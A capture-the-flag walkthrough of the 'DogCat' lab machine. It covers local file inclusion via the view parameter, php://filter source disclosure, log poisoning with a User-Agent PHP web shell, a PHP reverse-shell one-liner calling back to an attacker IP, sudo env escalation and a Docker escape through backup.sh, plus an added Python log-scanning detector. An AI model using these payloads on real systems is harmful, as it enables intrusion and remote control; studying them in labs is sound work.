# DogCat

## RECONNAISSANCE <a href="#id-4693" id="id-4693"></a>

I begin with the trusty old ***nmap*** scan, which shows us that ***TCP*** ports 22 and 80 are open. Since I don’t have an ***SSH*** username or password, port 80 is the way to go.

<figure><img src="https://miro.medium.com/v2/resize:fit:875/0*4oVea5tFSzR_PzfI" alt="" height="355" width="700"><figcaption></figcaption></figure>

On port 80, I get a page which asks us whether we want to see dog or cat pictures. So I first take a break from tech and browse through some really cute animal photos. Dogs are my favorites though, haha!!

<figure><img src="https://miro.medium.com/v2/resize:fit:875/0*yoYLdOd9sy2E1iJh" alt="" height="285" width="700"><figcaption></figcaption></figure>

<figure><img src="https://miro.medium.com/v2/resize:fit:875/0*NfnLH_Rexd2_ICBW" alt="" height="710" width="700"><figcaption></figcaption></figure>

<figure><img src="https://miro.medium.com/v2/resize:fit:875/0*EzYzS3k1JN8gM71d" alt="" height="541" width="700"><figcaption></figcaption></figure>

A bit relieved of stress, let’s get back to the work at hand.

The URL of the page looks like this:

<figure><img src="https://miro.medium.com/v2/resize:fit:875/0*QnOTEt1F9o3AJi3M" alt="" height="56" width="700"><figcaption></figcaption></figure>

Or this:

<figure><img src="https://miro.medium.com/v2/resize:fit:690/0*5MOMiXyC-N7SdixR" alt="" height="82" width="552"><figcaption></figcaption></figure>

So here we can somewhat control the input to the `view` parameter. I try to fidget around with that and see what kind of output we get.

So I put in a bunch of other inputs to `view`, and every time I get this output:

<figure><img src="https://miro.medium.com/v2/resize:fit:875/0*VllqVHm0fUHVXG5K" alt="" height="215" width="700"><figcaption></figcaption></figure>

Try to access “/etc/passwd”. Failed!!!

<figure><img src="https://miro.medium.com/v2/resize:fit:875/0*kPQ5OximNVI6pcsK" alt="" height="178" width="700"><figcaption></figcaption></figure>

Try to access “./dog”

<figure><img src="https://miro.medium.com/v2/resize:fit:875/0*UEPX_AFdLnFIsBXt" alt="" height="295" width="700"><figcaption></figcaption></figure>

Seems like I can call anything, but I need the text “dog” or “cat” somewhere in the request.

Let’s append “/etc/passwd” in the request.

<figure><img src="https://miro.medium.com/v2/resize:fit:875/0*2_4jL_4hq74eNQf2" alt="" height="246" width="700"><figcaption></figcaption></figure>

So there is an index.php at play here which uses the include() function!

So I try to access it by putting the URL as : [http://10.10.180.133/?view=dog/../index](http://10.10.180.133/?view=dog%2F..%2Findex)

Now I get the following output:

<figure><img src="https://miro.medium.com/v2/resize:fit:875/0*VlQvjPND06M3xcjX" alt="" height="247" width="700"><figcaption></figcaption></figure>

It appears that there’s a conflict. This error usually arises when trying to declare the same function twice, which in this case is probably caused by the include() function pulling index.php into itself.

So to retrieve index.php, I force PHP to base64-encode the file before it is used in the include() function, as follows:

Reference: <https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion>

Let’s intercept with Burp Suite

<figure><img src="https://miro.medium.com/v2/resize:fit:875/0*rYakCaCQ0bxl1jv8" alt="" height="284" width="700"><figcaption></figcaption></figure>

Send to Repeater

<figure><img src="https://miro.medium.com/v2/resize:fit:875/0*J2OY_2povZ4x3pcs" alt="" height="386" width="700"><figcaption></figcaption></figure>

Let’s view index page first.

`http://<ip>/?view=php://filter/convert.base64-encode/resource=./dog../../index`

Success!!! The result is a base64 string.

<figure><img src="https://miro.medium.com/v2/resize:fit:875/0*behUx1LElphy3Sq3" alt="" height="312" width="700"><figcaption></figcaption></figure>

Decode with Burp Suite’s Decoder.

Now I have source code of index.php.

<figure><img src="https://miro.medium.com/v2/resize:fit:875/0*y05KOjpkdW-JE30u" alt="" height="114" width="700"><figcaption></figcaption></figure>

Viewing the source code.

<figure><img src="https://miro.medium.com/v2/resize:fit:875/0*VG6NQshjOZfonPbG" alt="" height="218" width="700"><figcaption></figcaption></figure>

This means I have to include “dog” or “cat” in the request, and if I don’t supply the parameter “ext”, it will default to “.php”.

## Gaining Access <a href="#id-8c38" id="id-8c38"></a>

Let’s send the request again. This time I will try to read “/etc/passwd” and include the parameter “ext” (left empty so that “.php” is not appended):

`http://<ip>/?view=./dog../../../../../../../../etc/passwd&ext=`

Success!!!

<figure><img src="https://miro.medium.com/v2/resize:fit:875/0*XIvkmxHcmqPl0iff" alt="" height="342" width="700"><figcaption></figcaption></figure>

Viewing the page source, there is not much of use.

My next target is the server access logs, which I try to view with:

[http://10.10.180.133/?view=dog/../../../../../var/log/apache2/access.log\&ext=](http://10.10.180.133/?view=dog%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flog%2Fapache2%2Faccess.log\&ext=)

Just as I expected, I get the contents of access.log as follows:

<figure><img src="https://miro.medium.com/v2/resize:fit:875/0*5z6oBxSohMZVWHQY" alt="" height="333" width="700"><figcaption></figcaption></figure>

Now I try a bit of command execution. For starters, I try to feed `ls -la` into view:

[http://10.10.180.133/?view=ls%20-la\&ext=](http://10.10.180.133/?view=ls+-la\&ext=)

However, I get back the same initial page where we had to choose between dogs and cats.

<figure><img src="https://miro.medium.com/v2/resize:fit:875/0*gfolZmRvIIy2aH4G" alt="" height="181" width="700"><figcaption></figcaption></figure>

To inspect further, I check our access.log as previously shown. The last line gives us information about the last request we sent.

Two crucial things I notice here: whatever we put in `view` is URL-encoded in the log and hence not executed, whereas our User-Agent is logged verbatim. So what if I write some executable PHP code into our User-Agent :}

Let’s add the command.

Edit the User-Agent to be: `<?php system($_GET['cmd']); ?>`

Send the request as:

`/?view=./dog../../../../../../../../var/log/apache2/access.log&ext=&cmd=id`

<figure><img src="https://miro.medium.com/v2/resize:fit:875/0*iF9EgKgTHbPPeYln" alt="" height="280" width="700"><figcaption></figcaption></figure>

This shows us the user id (www-data), which means it worked.
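As an added defensive example (not code from the original write-up or the room), the Python below models the “dog”/“cat” substring check recovered from index.php next to a strict allowlist, and scans Apache access-log lines for the traversal, `php://` wrapper and User-Agent PHP-tag patterns used in this section. The log lines, IP and timestamps are constructed for this example.

```python
import re
from urllib.parse import unquote

# Constructed Apache "combined" log lines modelled on the requests above
# (IP address, timestamps and paths are made up for this example).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /?view=dog HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /?view=dog/../../../../../etc/passwd&ext= HTTP/1.1" 200 1840 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /?view=php://filter/convert.base64-encode/resource=dog/../index HTTP/1.1" 200 2200 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /?view=dog HTTP/1.1" 200 512 "-" "<?php system($_GET['cmd']); ?>"
"""

# Apache "combined" format: ip ident user [ts] "method path proto" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)


def naive_view_allowed(view: str) -> bool:
    """Model of the substring check recovered from index.php: any value
    that merely contains 'dog' or 'cat' passes, traversal included."""
    return "dog" in view or "cat" in view


def strict_view_allowed(view: str) -> bool:
    """Hardened form: exact allowlist of the two pages that exist."""
    return view in {"dog", "cat"}


def classify(line: str) -> list[str]:
    """Return the indicators found in one log line (empty list if benign)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparsed"]
    path = unquote(m["path"])  # the server logs the query URL-encoded
    findings = []
    if "../" in path or "..\\" in path:
        findings.append("path_traversal")
    if re.search(r"(?i)php://|data:|expect://", path):
        findings.append("php_wrapper")
    # PHP open tags in Referer or User-Agent are the log-poisoning signature
    if re.search(r"(?i)<\?php|<\?=", m["ref"] + m["ua"]):
        findings.append("log_poisoning")
    return findings


def scan(log: str) -> dict[int, list[str]]:
    """Map 1-based line numbers to indicators, keeping only flagged lines."""
    return {i: f for i, line in enumerate(log.splitlines(), 1) if (f := classify(line))}
```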

Let’s get a reverse shell.

Create a listener.

<figure><img src="https://miro.medium.com/v2/resize:fit:875/0*rbkMDr56aY4kfoWJ" alt="" height="303" width="700"><figcaption></figcaption></figure>

I tried a couple of commands from: <http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet>

Since this site runs PHP, this time I will use the PHP one-liner:

`php -r '$sock=fsockopen("10.9.3.51",1234);exec("/bin/sh -i <&3 >&3 2>&3");'`

Use Burp Suite to URL-encode the command.

<figure><img src="https://miro.medium.com/v2/resize:fit:875/0*N5azRIRNXJBeKuC5" alt="" height="110" width="700"><figcaption></figcaption></figure>

Copy to the request and send.

<figure><img src="https://miro.medium.com/v2/resize:fit:875/0*gTwmjEnT5eGpFUt3" alt="" height="302" width="700"><figcaption></figcaption></figure>

Back at the listener, I now have a shell.

<figure><img src="https://miro.medium.com/v2/resize:fit:875/0*PkpWwu1G4Bf3CA-N" alt="" height="212" width="700"><figcaption></figcaption></figure>

Let’s explore the machine.

Now I have the first flag.

<figure><img src="https://miro.medium.com/v2/resize:fit:875/0*VjVilTw-xHso11pa" alt="" height="373" width="700"><figcaption></figcaption></figure>

There’s flag2 in “/var/www”.

<figure><img src="https://miro.medium.com/v2/resize:fit:875/0*KH1zCSv4ugvD-PSZ" alt="" height="263" width="700"><figcaption></figcaption></figure>

I explore further and can’t find anything else.

## Privilege Escalation <a href="#id-9250" id="id-9250"></a>

Let’s check whether I can use the sudo command.

I can run “env” with sudo.

<figure><img src="https://miro.medium.com/v2/resize:fit:875/0*0BG9WAyAKzNUbJ9F" alt="" height="212" width="700"><figcaption></figcaption></figure>

Root command reference: <https://gtfobins.github.io/gtfobins/env/#sudo>

Now I’m root.

<figure><img src="https://miro.medium.com/v2/resize:fit:875/0*CkJ6MpaYHRXA1hRl" alt="" height="198" width="700"><figcaption></figcaption></figure>

Now I have flag3.

<figure><img src="https://miro.medium.com/v2/resize:fit:875/0*47CUlMRzM5WOQ9yI" alt="" height="223" width="700"><figcaption></figcaption></figure>

Let’s explore the machine further to find the last flag.

Nothing at first.

But I keep exploring the well-known Linux folders and files.

<figure><img src="https://miro.medium.com/v2/resize:fit:875/0*9KdJEPr9weAoe3sQ" alt="" height="466" width="700"><figcaption></figcaption></figure>

There’s a backups directory.

This “backup.sh” is interesting.

<figure><img src="https://miro.medium.com/v2/resize:fit:875/0*WmHMuHrO77ay38nN" alt="" height="99" width="700"><figcaption></figcaption></figure>

This machine is running inside Docker.

Let’s escape it.

Create another reverse shell.

<figure><img src="https://miro.medium.com/v2/resize:fit:875/0*JXG_LA9pc5YKdfOw" alt="" height="207" width="700"><figcaption></figcaption></figure>

Replace the former script in backup.sh with the reverse shell.

<figure><img src="https://miro.medium.com/v2/resize:fit:875/0*h84tICMCGa6QS0Xj" alt="" height="95" width="700"><figcaption></figcaption></figure>

Back to the listener and wait a while.

Now I have another shell.

<figure><img src="https://miro.medium.com/v2/resize:fit:875/0*AuQkF2bJ3FURuS55" alt="" height="168" width="700"><figcaption></figcaption></figure>

There’s the fourth flag.

<figure><img src="https://miro.medium.com/v2/resize:fit:875/0*zcNVzs0GQ6BlUF1j" alt="" height="182" width="700"><figcaption></figcaption></figure>

